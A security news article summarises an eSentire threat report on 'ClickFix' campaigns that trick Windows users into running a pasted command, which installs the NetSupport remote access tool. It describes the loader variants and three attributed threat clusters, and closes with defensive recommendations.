Cybercriminals are increasingly using a technique known as “ClickFix” to deploy the NetSupport remote administration tool (RAT) for malicious purposes.
According to a new report from eSentire’s Threat Response Unit (TRU), threat actors have shifted their primary delivery strategy from fake software updates to the ClickFix initial access vector throughout 2025.
This method abuses a legitimate remote support service to trick users into granting attackers control over their systems.
The attack leverages social engineering, where victims are lured to a ClickFix page and instructed to paste a malicious command into their Windows Run Prompt.
Executing this command triggers a multi-stage infection process, starting with a loader script that downloads and installs the NetSupport RAT, giving attackers full remote control over the compromised machine.
Evolving Loader Tactics
TRU researchers have identified several distinct loader types used in these campaigns. The most prevalent is a PowerShell-based loader that fetches a JSON file containing the NetSupport payloads encoded in Base64.
The script then decodes these payloads, writes them to a hidden directory, and establishes persistence by creating a shortcut in the Windows startup folder. This ensures the RAT runs automatically every time the system reboots.
A more recent variant of the PowerShell loader attempts to cover its tracks by deleting registry values from the RunMRU key, effectively erasing evidence of the initial command execution.
A less common but still notable method involves using the legitimate Windows Installer service (msiexec.exe) to download and run malicious MSI packages that ultimately deploy the RAT. These evolving tactics show that attackers are actively refining their methods to evade detection and analysis.
Tracking the Threat Actors
Analysis of the campaigns has allowed researchers to cluster the activity into three distinct threat groups based on their tools and infrastructure.
The first, dubbed the “EVALUSION” campaign, is highly active and uses a wide variety of loaders and infrastructure spread across multiple countries. The “FSHGDREE32/SGI” cluster primarily uses bulletproof hosting in Eastern Europe.
A third, separate actor tracked as “XMLCTL” or UAC-0050, uses different techniques, including MSI-based loaders and commercial US-based hosting, suggesting a different operational playbook.
To combat these threats, experts recommend organizations disable the Run prompt via Group Policy, block unapproved remote management tools, and implement robust security awareness training for employees.
Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.
